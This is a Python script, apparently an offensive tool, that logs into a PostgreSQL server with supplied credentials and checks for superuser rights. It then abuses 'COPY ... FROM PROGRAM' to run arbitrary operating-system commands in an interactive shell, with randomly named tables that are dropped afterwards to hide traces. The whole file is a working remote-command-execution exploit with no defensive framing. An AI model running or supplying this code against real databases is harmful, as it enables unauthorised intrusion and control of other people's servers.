#!/usr/bin/env python3import argparseimport randomimport psycopg2 as pg

1. #!/usr/bin/env python3
2.  
3. import argparse
4. import random
5. import psycopg2 as pg
6.  
7. rand_str = lambda x: ''.join(random.choices("abcdefghijklmnopqrstuvwxyz", k=x))
8.  
9. class PGShell(object):
10.  
11.     def __init__(self, **kwargs):
12.         self.host       = kwargs['host']
13.         self.port       = kwargs['port']
14.         self.user       = kwargs['user']
15.         self.password   = kwargs['pass']
16.         self.dbname     = kwargs['dbname']
17.  
18.         self.tablename  = rand_str(random.randint(8, 15))
19.         self.columnname = rand_str(random.randint(2, 5))
20.  
21.         self.conn = None
22.  
23.         if not self.connect():
24.             exit()
25.  
26.  
27.     def connect(self):
28.         print(f"[*] Connecting to {self.host}:{self.port}... (db: {self.dbname}, user: {self.user})")
29.         try:
30.             self.conn = pg.connect(f"host={self.host} port={self.port} user={self.user} password={self.password} dbname={self.dbname}")
31.             print("[!] Connected!")
32.             print(f"[*] We will use table {self.tablename} and column {self.columnname} to leverage RCE...")
33.             return True
34.         except:
35.             print("[x] Connection error!")
36.             return False
37.  
38.     def do_query(self, query):
39.         cur = self.conn.cursor()
40.         cur.execute(query)
41.         try:
42.             return [x[0] for x in cur.fetchall()]
43.         except:
44.             return None
45.  
46.     def init_recon(self):
47.         user = self.do_query("select current_user")[0]
48.         print(f"[*] Connected as user {user}")
49.         self.su = self.do_query(f"select usesuper from pg_catalog.pg_user where usename='{user}'")[0]
50.         if self.su:
51.             print(f"[!] Sweet! {user} is superuser!")
52.             return True
53.         else:
54.             print(f"[x] Unable to leverage RCE... {user} is not a superuser")
55.             return False
56.  
57.  
58.     def rce(self, command):
59.         self.do_query(f"drop table if exists {self.tablename}")
60.         self.do_query(f"create table {self.tablename}({self.columnname} TEXT)")
61.         self.do_query(f"COPY {self.tablename} from program '{command}'")
62.         data = self.do_query(f"select {self.columnname} from {self.tablename}")
63.         self.do_query(f"drop table {self.tablename}")
64.         return data
65.  
66.     def clean(self):
67.         print("\n[*] Cleaning database...")
68.         self.do_query("rollback")
69.         self.do_query(f"drop table if exists {self.tablename}")
70.  
71. def get_args():
72.     p = argparse.ArgumentParser()
73.     p.add_argument("-H", "--host",help="Hostname or IP", default="localhost")
74.     p.add_argument("-p", "--port",help="Port of the service", default="5432")
75.     p.add_argument("-d", "--dbname",help="database to connect", default="postgres")
76.     p.add_argument("-U", "--user",help="Username to connect with", required=True)
77.     p.add_argument("-P", "--pass",help="Password to use", required=True)
78.  
79.     return vars(p.parse_args())
80.  
81. def main():
82.     args = get_args()
83.     pgshell = PGShell(**(args))
84.     if not pgshell.init_recon():
85.         return
86.  
87.     try:
88.         while True:
89.             user_input = input(f"{pgshell.user}>> ")
90.             try:
91.                 for line in pgshell.rce(user_input):
92.                     print(line)
93.                 print("-"*50)
94.             except Exception as e:
95.                 print(f"[x] Error: {e}")
96.                 pgshell.clean()
97.     except KeyboardInterrupt:
98.         pgshell.clean()
99.         return
100.  
101. if __name__=='__main__':
102.     exit(main())